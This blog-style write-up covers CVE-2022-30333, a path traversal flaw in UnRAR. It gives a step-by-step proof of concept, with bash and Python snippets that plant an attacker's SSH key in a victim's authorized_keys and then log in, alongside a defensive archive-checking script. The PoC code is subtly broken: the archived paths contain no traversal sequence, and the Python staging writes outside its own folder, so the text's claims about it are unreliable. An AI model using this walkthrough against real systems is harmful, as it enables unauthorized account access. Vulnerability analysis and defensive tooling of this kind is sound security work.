CVE-2022-30333 is a critical security vulnerability found in RARLAB’s UnRAR utility (before version 6.12) running on Linux and UNIX-like systems. This bug can let attackers overwrite files outside the intended extraction directory by crafting a malicious RAR archive, potentially letting them place files like ~/.ssh/authorized_keys. This could allow unauthorized SSH logins to the targeted account!

> Note: WinRAR for Windows and the RAR app for Android are NOT affected.

What is UnRAR and Why Does It Matter?

UnRAR is a command-line tool made by RARLAB, used to extract .rar files on Unix and Linux. This tool is widely used — sometimes called from backend scripts or even mail scanners — which means that if it is fed untrusted archives, it could spell big trouble.

The Vulnerability: Directory Traversal

Path traversal (or directory traversal) is a type of security error where software fails to sanitize file paths, letting attackers inject things like ../ (dot-dot-slash) into file names. This tricks the program into writing files *outside* the intended folder.

For UnRAR before 6.12, it was possible to craft a .rar archive where a file’s path included sequences such as:

../../.ssh/authorized_keys

When extracted, UnRAR would happily create or overwrite the victim’s SSH keys—yikes.

Proof of Concept: Crafting & Using the Malicious RAR

If you want to see a simple demo (for educational purposes only!), here’s how such an attack could look.

1. Prepare the payload file

Suppose we want to "plant" an SSH key for a user named victim. First, make a file structured as

../../home/victim/.ssh/authorized_keys

Put a line you control inside (e.g., your SSH public key).

2. Create a malicious RAR archive

RARLAB’s own RAR tool lets you make a RAR archive with this file structure. For now, let’s mock it with a simple example using the rar command line tool:

```bash
# Prepare the directory structure
mkdir -p malicious_dir/home/victim/.ssh
echo "ssh-rsa AAAAB3Nza... attacker@evil" > malicious_dir/home/victim/.ssh/authorized_keys

# Create the RAR with relative paths (the archive lands next to malicious_dir,
# which is where the final "cd .." returns to)
cd malicious_dir
rar a ../evil.rar home/victim/.ssh/authorized_keys
cd ..
```

This will nest the file structure inside the RAR archive so that, when unpacked, UnRAR might process the traversal paths.

3. Extract with a VULNERABLE UnRAR

Assume the vulnerable UnRAR is on the target and you send them (or get an automated process to use) evil.rar:

```bash
unrar x evil.rar /tmp/target_dir
```

With CVE-2022-30333, UnRAR may interpret the ../../ path and write the authorized_keys file to /home/victim/.ssh/authorized_keys, even though the extraction directory was /tmp/target_dir.

4. Gain Access

If the target is running SSH and does not use additional restrictions on authorized keys, you may now SSH as victim using your injected key!

A sample exploit script and further analysis are available here:

- Official RARLAB UnRAR Advisory
- HackerOne Report and Exploit (via SonarSource)
- Debian/LTSA Security Tracker
- Exploit in the wild (GitHub gists examples)

Example PoC Code Snippet (Python + UnRAR)

Here’s a minimal PoC using Python to stage the payload for a malicious RAR (note: you still need the rar tool to create the archive itself):

```python
import os

payload_path = "../../home/victim/.ssh/authorized_keys"
ssh_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC... attacker@evil"

# The payload path is relative to the staging directory, so every parent
# directory has to exist before the file can be written.
full_path = os.path.join("exploit_dir", payload_path)
os.makedirs(os.path.dirname(full_path), exist_ok=True)
with open(full_path, "w") as f:
    f.write(ssh_key)

# Now you must use the RAR tool to package the structure.
# rar a exploit.rar exploit_dir/*
```

Download updated binaries or sources here:

- RARLAB UnRAR Downloads

For admins: always verify archive contents before automatic extraction, and never run UnRAR as root or as another privileged user.
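As an added example (not part of the original post and not RARLAB's code), here is a pre-extraction check in Python that lists an archive with unrar's `lb` (bare listing) command and refuses the whole archive if any entry name would land outside the destination. The sample entry list is constructed, and treating backslashes as path separators is a conservative choice of this example so the check does not depend on how the extractor normalises names.

```python
import os
import posixpath
import subprocess

# Constructed sample entry names, including the traversal path from the post.
SAMPLE_ENTRIES = [
    "docs/readme.txt",
    "../../home/victim/.ssh/authorized_keys",
    "..\\..\\home\\victim\\.ssh\\authorized_keys",
    "/etc/cron.d/job",
    "./ok/./file",
]


def entry_is_safe(dest_dir: str, entry_name: str) -> bool:
    """True only if entry_name, written under dest_dir, stays inside dest_dir."""
    # Conservative: treat backslashes as separators too (Windows-style names).
    name = entry_name.replace("\\", "/")
    if posixpath.isabs(name):
        return False
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if ".." in parts:
        return False
    # realpath also follows symlinks that already exist under dest_dir, so a
    # link left by an earlier extraction cannot redirect this entry outside.
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, *parts))
    return target == dest or target.startswith(dest + os.sep)


def unsafe_entries(entry_names, dest_dir):
    """Return the entry names that must block extraction into dest_dir."""
    return [n for n in entry_names if not entry_is_safe(dest_dir, n)]


def list_rar_entries(archive):
    """Bare file list from a real archive via 'unrar lb' (names only)."""
    out = subprocess.run(["unrar", "lb", archive], capture_output=True,
                         text=True, check=True)
    return [line for line in out.stdout.splitlines() if line]


def safe_extract(archive, dest_dir):
    """Refuse the whole archive if any entry escapes; otherwise extract it."""
    bad = unsafe_entries(list_rar_entries(archive), dest_dir)
    if bad:
        raise ValueError(f"refusing {archive}: unsafe entries {bad}")
    os.makedirs(dest_dir, exist_ok=True)
    subprocess.run(["unrar", "x", "-y", archive, dest_dir + os.sep], check=True)


if __name__ == "__main__":
    print(unsafe_entries(SAMPLE_ENTRIES, "/tmp/target_dir"))
```

The check sees entry names only, not the targets of symbolic-link entries, so keep extracting into a fresh empty directory as an unprivileged user even with this gate in place.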

Summary Table

| Item | Details |
|---------------------|-----------------------------------------|
| CVE | CVE-2022-30333 |
| Affected Version | UnRAR before 6.12, Linux/Unix |
| Attack Type | Path Traversal (Directory Traversal) |
| Impact | File overwrite/creation, possible RCE |
| Fixed In | UnRAR 6.12 |
| Windows/Android | NOT affected |

Conclusion

CVE-2022-30333 is a classic but very dangerous path traversal bug in RARLAB’s UnRAR for Linux/Unix. It’s a loud reminder to keep your tools up to date and never trust file paths blindly. If you run UnRAR anywhere, patch it NOW and audit your history for suspicious archives!

References

- RARLAB official fix
- SonarSource Blog: Full Analysis
- Debian Tracker - CVE-2022-30333
- Exploit Gist

Timeline

Published on: 05/09/2022 08:15:00 UTC
Last modified on: 08/05/2022 17:15:00 UTC